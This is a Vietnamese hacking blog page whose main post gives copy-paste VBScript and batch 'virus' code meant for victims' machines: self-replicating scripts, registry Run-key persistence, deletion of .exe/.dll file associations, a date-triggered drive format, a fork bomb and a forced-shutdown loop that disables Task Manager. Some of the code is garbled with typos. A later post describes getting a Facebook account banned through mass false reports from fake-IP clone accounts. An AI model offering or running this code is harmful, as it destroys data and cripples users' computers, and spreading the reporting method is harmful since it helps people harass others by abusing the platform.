Cách Tạo Virus

5:19 AM Add Comment
lưu với đuôi .vbs
Đây mới chỉ là virus, nếu viết autorun cho nó nữa thì cực kỳ nguy hiểm, con này mỗi lần chạy thì nó chiếm 100% cpu của 1 luồng dữ liệu. Với máy core 2duo thì click 2 phát CPU 100%, core i3, i5 thì click 4 lần. Sau khi bị chiếm 100% cpu muốn tắt đi thì vào Task Manager tắt hết những chương trình có đuôi vbscript đang chạy. Đó là virut chạy do con người điều khiển, còn nếu viết thêm autorun để nó chạy tự động, giả sử số lần click là lớn hơn 10 thì thôi rồi, chỉ có cài lại win.


Loại virus mình giới thiệu sau đây có tác dụng làm quá tải RAM của máy tính ,máy tính nạn nhân chỉ có một màu đen,khởi động lại cũng không ăn thua ,cách làm như sau :mở notepad lên và chép dòng mã lệnh dưới vào:
On Error Resume Next
Set popo= Createobject("scripting.filesystemobject")
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
Set popo2= CreateObject("WScript.Shell")
popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
Set treomay= CreateObject("WScript.Shell")
msgbox"May tinh cua ban bi nhiem virut",,"Danger"
msgbox"May se bi lag trong 2s",,"Danger"
msgbox"Ban con 1s",,"Danger"
msgbox"Ban con 0s",,"Danger"
msgbox"May da bi nhiem virus",,"Danger"
Me.visible=false
App.Taskvisible=false
Do
Me.visible=false
App.Taskvisible=false
treomay.run "notepad",false
loop
Lưu với đuôi .bat
Loại virus có khả năng mỗi khi bấm sẽ tạo ra một thư mục và làm cho máy tính nạn nhân tràn ngập virus,mở notepad lên và chép đoạn mã bên dưới vào :
'Thuoc Doc !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub
Lưu với đuôi .vbs
Sau đây là đoạn code để giải virus thuốc độc ở trên ,mở notepad lên chép code sau vào:
'Thuoc Giai !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders For Each f1 In sf
'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
'COP.write VBCopy
'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
'CAP.write VBCopy
'Set ATT=fso.GetFolder(f1.Path)
'ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
FolderList(f1.Path)
Next
End sub
Lưu với tên .vbs
Con virus sau có khả năng xóa key file của máy tính nạn nhân và đây là một trong số mấy con nguy hiểm nhất ở đây,mở notepad lên gõ lệnh sau:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE
Lưu với đuôi.bat
Bomb virus ,chép code vào notepad như sau :
If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit
Lưu với đuôi.bat
Làm loạn nút Caps Lock ,chép code sau vào:
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Lưu với đuôi.bat
Virus làm ngưng hệ thống máy tính ,chép code sau vào notepad:
@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause
Lưu với đuôi.bat
Con virus dưới đây vô cùng đơn giản nhưng gây hại cũng khá ,nó sẽ tạo ra liên tục các bản cmd làm ngưng hoạt động của máy tính nạn nhân ,buộc nạn nhân phải tắt máy nhưng một đều rằng khó mà có thể tắt máy trừ khi cúp cầu dao thôi ,mỏ notepad lên chép đoạn mã dưới vào:
start 111.cmd
Lưu với đuôi.cmd
Con virus dưới đây vô cùng khủng khiếp khi nạn nhân click bất kì thứ gì thì 5 giây sau máy sẽ tự động tắt ,không những như vậy khi mở máy lại cũng 5 giây tự tắt ,mở notepad và chép đoạn mã sau vào:
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v shutdown /t REG_SZ /d "shutdown.exe -f -s -t 05" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
cls
copy thelove.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\"
cls
taskkill /f /im explorer.exe
cls
shutdown.exe -f -s -t 05 -c "your computer will turn off after 5s ..."
cls
@echo off
echo Warning!!!!!!!!May Tinh Cua Ban Da Bi Nhiem Virus Bat Diet !!!!!!!!!
echo GOOD BYE 
pause
del Mr.Boss.bat
Lưu với đuôi .bat
Nếu bạn cho chạy kèm với con này thì khả năng của nó là vô đối và hầu như là bất diệt,đoạn mã sau :
eg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v shutdown /t REG_SZ /d "shutdown.exe -f -s -t 05" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
cls
copy thelove.bat "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\"
cls
taskkill /f /im explorer.exe
cls
@echo off
echo Warning!!!!!!!!May Tinh Cua Ban Da Bi Nhiem Virus Bat Diet !!!!!!!!!
echo GOOD BYE SEE YOU AGAIN
pause
del Mr.Boss.bat
Lưu với đuôi .bat
10:20 PM Add Comment
            Cách Mở Chặn IP , DNS Facebook
1 . Trên PC : Google : 
B1 : Tải Hola (Link phía dưới)
B2:Cài đặt 
B3: Chọn Việt Nam ,...
Và hoàn thành .
2 .Trên Đt 
- Ảnh 1 : Các bạn tải app Betternet về 
- Ảnh 2 : mở vô xong lướt qua trang cuối cùng - Ảnh 3 : Nhấn vào chữ " Got it " nhe - Ảnh 4 : các bạn nhấn vào chữ " Install profile " thì nó sẽ hiện lên chữ " Allow or Don't Allow " thì các bạn nhất Allow - Ảnh 5 : và cuối cùng ảnh như ảnh 5 bạn để dấu vân tay vào là đã CONNECT - Trên phần đt kế bên chữ 3G có hiện lên dòng chữ VPN là đã Hoàn Tất . - Mình chia sẽ cho mấy bạn nào có bạn sáng h ko vô Facebook đc làm theo các bước này sẽ online đc ngay

Chúc các bạn thành công .

By : Tài Trọng Lê 
TUT FAQ Apps

TUT FAQ Apps

4:07 AM Add Comment
  1. Tus FAQ APP :
    * Lưu ý : Phải Fake ip mới die. Fake ip bằng Geoproxy :  Nếu không làm theo -> không die tôi không chịu trách nhiệm nhé
    * Bước 1 : lấy 1 clone ip Thái Lan (Thailand) ~> buff sub victim
    * Bước 2 : lấy 4 clone ip New Zealand ~> báo cáo tên giả
    * Bước 3 : lấy 17 clone ip New Zealand ~> báo cáo giả mạo doanh nghiệp
    Hóng Die :)

Hướng dẫn download Video trên facebook

9:25 PM Add Comment
   Hướng dẫn download Video trên facebook .

 B1 : Đổi www.facebook.com thành m.facebook 

 B2 : Chọn video cần download , chọn chuột trái chỏ vào video 
Chúc các bạn thành công !! 

Bộ Ảnh Hacker Cực Chất

5:13 AM Add Comment
                                 Share Bộ Ảnh Hacker Cực Chất 




By : Tài Trọng Lê . 

Deface là gì ? Cách khắc phục

7:30 PM Add Comment

1. Định nghĩa:

Deface được định nghĩa là tấn công thay đổi nội dung, thông qua một điểm yếu nào đó, hacker sẽ thay đổi nội dung website của nạn nhân. Việc thay đổi nội dung này nhằm một số mục đích :
  • Mục đích cao đẹp: cảnh báo quản trị viên biết website đang tồn tại lỗ hỏng bảo mật / điểm yếu nghiêm trọng….
  • Mục đích không đẹp: chứng tỏ năng lực bản thân, dạng này rất dễ gặp như kiểu hacked by….
  • Mục đích xấu: thù hằn, nội dung thay đổi thường là lăng mạ nạn nhân hoặc nội dung liên quan đến chính trị, tôn giáo…

2. Vì sao website bị Deface:

Có rất nhiều nguyên nhân bị Deface, chủ yếu nhất là website tồn tại điểm yếu bảo mật nghiêm trọng khiến cho hacker có thể upload file lên server (ví dụ: bypass upload fckeditor), hoặc có quyền đăng nhập vào trang quản trị website (ví dụ: SQL Injection), thậm chí nếu website an toàn vẫn bị Deface nếu như hosting khác cùng tồn tại trên 1 server bị tấn công (local attack).

Các trường hợp website bị tấn công Deface đa số là do :
  • Đặt mật khẩu quản trị quá yếu ( không đủ độ dài ký tự, không có các ký tự viết hoa, ký tự đặc biệt,... ), thiếu cơ chế chống brute force khiến kẻ tấn công có thể dò password admin.
  • Cài đặt các module, plugin, extension,... trong các mã nguồn mở hiện nay ( thường là các website joomla, wordpress,...).
  • Để lộ mật khẩu quản trị.
  • ...v....v....

3. Làm thế nào để phát hiện bị Deface:

Thông thường tấn công Deface chủ yếu là vào các trang mặc định như : index.php, index.html, home.html, default.html, trangchu.html..... thì chỉ cần xử lý các trang mặc định này website sẽ hoạt động lại. 

Nhưng nếu hacker không thay đổi nội dung những file trên thì bạn khó thể phát hiện và bạn sẽ nhận được cảnh báo từ việc truy cập website hoặc nhà quản lý hosting.

4. Cách khắc phục:

Nếu bạn thực sự là một người quản trị hệ thống hay website, chắc chắn sau tình huống này bạn sẽ tự hỏi rằng: "Tại sao hacker lại tải lên được đoạn mã chứa trang deface?"

That's problems, hãy xem những thông tin nhật ký của máy chủ và truy tìm xem, hacker đã làm gì và làm như thế nào trên hệ thống của mình!

Ngoài ra, bạn cũng có thể tham khảo 1 số biện pháp tình thế mà chúng tôi khuyến cáo :
  • Thường xuyên kiểm tra dữ liệu website ( để ý thời gian tập tin, thư mục bị thay đổi ).
  • Có kế hoạch backup dữ liệu cụ thể để lúc cần có thể restore lại ngay.
  • Không nên cài đặt các module, plugin, extension,... không thật sự cần thiết và không rõ nguồn gốc ( nên download module, plugin, extension,.... từ các trang web uy tín ).
  • Nên đổi mật khẩu quản trị theo 1 chu kỳ định sẵn và lưu giữ cẩn thận.
Subscribe to: Comments (Atom)

Kategori

Kategori